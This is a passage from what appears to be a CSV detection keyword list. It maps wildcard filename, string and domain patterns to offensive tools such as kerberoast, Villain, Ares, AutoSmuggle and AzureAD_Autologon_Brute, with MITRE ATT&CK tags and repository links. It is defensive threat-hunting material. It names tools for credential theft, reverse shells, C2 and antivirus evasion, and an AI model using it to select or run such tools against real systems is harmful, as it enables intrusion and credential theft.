Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/All.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/C2*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Dependencies*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Initial_Access*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Lateral.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Payload_Development*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Recon*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Situational_Awareness*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Social.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Staging*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Web.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Wireless.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoC2/Wordlists*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*AutoCompletionHandlerC2ServerManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*autodiscover/brute.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*autoexploit.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*autokerberoast.ps1*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*autokerberoast_noMimikatz.ps1","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*autoKirbi2hashcat.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*autolace.twilightparadox.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*automachine.servequake.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*AutoNSE*","offensive_tool_keyword","autonse","Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmaps most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap. or write their own to meet custom needs. For more informations https://nmap.org/book/man-nse.html","T1059.001 - T1059.003 - T1059.005 - T1059.006 - T1027 - T1064 - T1086 - T1085","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/m4ll0k/AutoNSE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*autopwn*","offensive_tool_keyword","autopwn","tools for pentester. autopwn is designed to make a pentesters life easier and more consistent by allowing them to specify tools they would like to run against targets. without having to type them in a shell or write a script. This tool will probably be useful during certain exams as well..","T1583 - T1059 - T1216 - T1053 - T1027","TA0002 - TA0008 - TA0003","N/A","N/A","Exploitation tools","https://github.com/nccgroup/autopwn","1","1","N/A","N/A","4","375","102","2019-04-23T09:58:28Z","2015-02-23T08:18:01Z" +"*AutoRDPwn*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*AutoSmuggle.csproj*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*AutoSmuggle.exe*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*AutoSmuggle.sln*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*AutoSmuggle-master*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*autostart/ares.desktop*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*autoTGS_NtlmCrack.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*autotimeline *","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","0","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" +"*autotimeline.py*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" +"*autotimeliner.git*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" +"*aux/dump_credentials*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*aux/enum_system.rc*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*aux/msf/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*aux/persistence.rc","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*aux/privilege_escalation.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*aux/Start-Webserver.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*auxiliary/crawler*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auxiliary/sqli/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*av_hips_executables.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*avast_memory_dump.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*avet-master.zip*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*avflagged.exe*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*avrdude -c usbasp -p m328p -U flash:w:avr.hex*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*avred-main.zip*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*av-update-urls.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*awesome-cve-poc*","offensive_tool_keyword","POC","list of poc exploitation for nown CVE","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tools","https://github.com/qazbnm456/awesome-cve-poc","1","1","N/A","N/A","10","3159","741","2022-01-04T19:07:43Z","2017-02-02T06:43:14Z" +"*Awesome-Hacking*","offensive_tool_keyword","Awesome-Hacking","A collection of awesome lists for hackers. pentesters & security researchers.","T1566 - T1590 - T1204 - T1210 - T1212 - T1213","TA0002 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github/Awesome-Hacking","1","1","N/A","N/A","10","69666","8680","2023-08-08T10:17:21Z","2016-03-30T15:47:10Z" +"*Awesome-Hacking-Resources*","offensive_tool_keyword","Awesome-Hacking-Resources","A collection of hacking / penetration testing resources to make you better!","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Exploitation tools","https://github.com/vitalysim/Awesome-Hacking-Resources","1","1","N/A","N/A","10","13938","2049","2022-08-22T09:10:41Z","2017-10-10T19:09:18Z" +"*awesome-osint*","offensive_tool_keyword","awesome-osint","A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC). the term open refers to overt. publicly available sources (as opposed to covert or clandestine sources)","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/jivoi/awesome-osint","1","1","N/A","N/A","10","14096","2404","2023-10-04T14:37:06Z","2016-11-30T13:26:11Z" +"*awesome-pentest*","offensive_tool_keyword","awesome-pentest","A collection of awesome penetration testing and offensive cybersecurity resources.","T1200 - T1210 - T1213 - T1583 - T1589","TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/enaqx/awesome-pentest","1","1","N/A","N/A","10","19309","4319","2023-09-19T03:06:47Z","2014-08-03T23:13:53Z" +"*awesome-pentest-cheat-sheets*","offensive_tool_keyword","awesome-pentest-cheat-sheets","Collection of cheat sheets useful for pentesting","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/coreb1t/awesome-pentest-cheat-sheets","1","0","N/A","N/A","10","3508","755","2023-08-04T12:41:53Z","2016-11-29T00:00:18Z" +"*awesome-scapy*","offensive_tool_keyword","awesome-scapy","A Python tool and library for low level packet creation and manipulation","T1571 - T1596 - T1567 - T1569","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/secdev/awesome-scapy","1","1","N/A","N/A","2","148","29","2023-03-08T23:26:41Z","2020-02-04T12:17:35Z" +"*awesome-static-analysis*","offensive_tool_keyword","awesome-static-analysis","This is a collection of static analysis tools and code quality checkers","T1064 - T1027 - T1029 - T1518","TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/codefactor-io/awesome-static-analysis","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*awesome-web-security*","offensive_tool_keyword","awesome-web-security","Curated list of Web Security materials and resources.Needless to say. most websites suffer from various types of bugs which may eventually lead to vulnerabilities. Why would this happen so often? There can be many factors involved including misconfiguration. shortage of engineers' security skills. etc. To combat this. here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques. and I highly encourage you to read this article So you want to be a web security researcher? first","T1190 - T1191 - T1192 - T1210 - T1213","TA0002 - TA0003 - TA0007","N/A","N/A","Web Attacks","https://github.com/qazbnm456/awesome-web-security","1","1","N/A","N/A","10","10124","1610","2023-09-07T06:54:29Z","2017-01-29T16:50:21Z" +"*awesome-windows-domain-hardening*","offensive_tool_keyword","awesome-windows-domain-hardening","A curated list of awesome Security Hardening techniques for Windows with additional links to exploitation tools","T1563 - T1059 - T1547 - T1057 - T1574","TA0002 - TA0008 - TA0003 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/PaulSec/awesome-windows-domain-hardening","1","0","N/A","N/A","10","1665","280","2020-01-07T19:56:18Z","2017-02-19T19:20:38Z" +"*awk_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*aws configure --profile exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*awsloot.py *","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" +"*axcrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*aydinnyunus/PassDetective*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*azfvgayqKwtFApcvyRedpUXculaeCCGA*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*Azure-AccessPermissions.ps1*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Azure-AccessPermissions-master*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*AzureAD AutoLogon Brute*","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","0","N/A","N/A","1","96","22","2023-02-17T20:11:27Z","2021-10-01T05:20:25Z" +"*AzureAD_Autologon_Brute*","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","1","N/A","N/A","1","96","22","2023-02-17T20:11:27Z","2021-10-01T05:20:25Z" 